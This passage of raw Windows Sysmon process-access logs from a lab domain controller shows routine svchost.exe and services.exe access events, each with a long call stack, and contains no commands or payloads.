TEM32\ntdll.dll+51791 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.647{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.647{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.646{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.646{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.646{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.646{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.646{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.646{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.646{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.645{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.645{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.627{10ACEC4A-853E-5FCF-0A00-000000009101}8521136C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.567{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.567{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.567{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.567{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001584Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.567{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001583Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.567{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001582Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.567{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001581Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001580Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.566{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001579Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.557{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001578Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.557{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001577Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.557{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001576Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 